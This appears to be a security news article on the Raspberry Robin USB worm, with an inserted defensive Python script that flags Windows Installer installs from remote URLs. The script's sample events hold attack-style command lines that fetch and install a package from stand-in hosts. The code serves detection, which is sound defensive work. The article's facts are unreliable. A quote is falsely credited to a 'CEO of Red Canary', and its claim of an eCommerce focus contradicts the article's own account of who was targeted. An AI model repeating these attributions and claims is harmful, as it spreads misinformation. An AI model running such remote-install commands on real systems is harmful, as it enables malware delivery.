
Trend Micro researchers discovered Raspberry Robin worm attacks aimed at telecommunications and government office systems in Latin America, Australia, and Europe.

The campaign has been in full swing since September 2022, with the majority of infections reported in Argentina (34.8%), followed by Australia (23.2%).

The research released by Trend Micro said: “We found samples of the Raspberry Robin malware spreading in telecommunications and government office systems beginning September.”

“The main payload is packed with more than ten layers for obfuscation and can deliver a fake payload once it detects sandboxing and security analytics tools.”

Security experts from Red Canary have found the Windows worm known as Raspberry Robin, which spreads via detachable USB storage devices.

In September 2021, when the malware was initially discovered, experts saw that it was explicitly aimed at manufacturing and technology-related companies.

“The Raspberry Robin worm is designed to spread via removable USB storage devices, and it can also infect computers on the same network as a target machine,” said Robert Falcone, CEO of Red Canary.

“It’s clear that this threat actor has an eCommerce-focused agenda and is targeting companies that are critical to eCommerce networks or systems.”

The malware uses Windows Installer to connect to QNAP-related domains and obtain a malicious DLL. This DLL connects to in-memory shared sections and communicates with its C2 server.
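Defenders can hunt for the download step described above by flagging Windows Installer (msiexec.exe) processes that are told to install a package from a URL. The following is an added example, not code from Trend Micro or Red Canary; the event fields, sample events and allowlisted host are constructed assumptions.

```python
import re

URL_RE = re.compile(r"https?://([^/\s:\"']+)", re.IGNORECASE)
INSTALL_SWITCHES = {"/i", "-i", "/package", "-package"}  # msiexec install options
# Assumption: hosts your own software distribution is expected to use.
ALLOWED_HOSTS = {"deploy.corp.example"}

# Constructed process-creation events (image path + command line), not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmd": "msiexec /q /i http://nas-example.invalid:8080/pkg"},
    {"image": r"C:\Windows\SysWOW64\MSIEXEC.EXE",
     "cmd": 'MSIexec -Q -I "hTTp://Device.Example.invalid/a"'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Temp\setup.msi /qn"},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmd": "msiexec /i https://deploy.corp.example/agent.msi /qn"},
    {"image": r"C:\Windows\System32\curl.exe",
     "cmd": "curl http://other.example.invalid/"},
]


def remote_msi_host(image, cmd):
    """Return the lower-cased remote host msiexec was told to install from, or None."""
    if image.lower().rsplit("\\", 1)[-1] != "msiexec.exe":
        return None
    # Windows switches are case-insensitive and may be quoted, so normalise tokens.
    tokens = [t.strip('"').lower() for t in cmd.split()]
    if not any(t in INSTALL_SWITCHES for t in tokens):
        return None
    match = URL_RE.search(cmd)
    return match.group(1).lower() if match else None


def find_alerts(events, allowed=ALLOWED_HOSTS):
    """Return (event index, host) for every remote install from a non-allowlisted host."""
    alerts = []
    for idx, event in enumerate(events):
        host = remote_msi_host(event["image"], event["cmd"])
        if host and host not in allowed:
            alerts.append((idx, host))
    return alerts


if __name__ == "__main__":
    for idx, host in find_alerts(SAMPLE_EVENTS):
        print(f"ALERT event {idx}: msiexec installing from {host}")
```

In practice the same logic would run over process-creation telemetry such as Sysmon or EDR events, with the allowlist tuned to the organisation's own deployment servers.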

Trend Micro’s analysis showed that the main malware routine contains both a real and a fake payload. Once the malicious code detects sandboxing tools, it loads the fake payload, while the real payload stays concealed within the packing layers and later connects to the Tor network.

As the Raspberry Robin worm continues to attract attention, governments across the globe must step up their cyber security efforts to prevent future attacks.

If you are a business owner or IT professional, it is important to protect your systems from Raspberry Robin attacks. This can include implementing strong antivirus software, educating employees about safe online behaviour, and regularly backing up your data. With proper precautions in place, you can help keep your systems safe from this harmful worm.
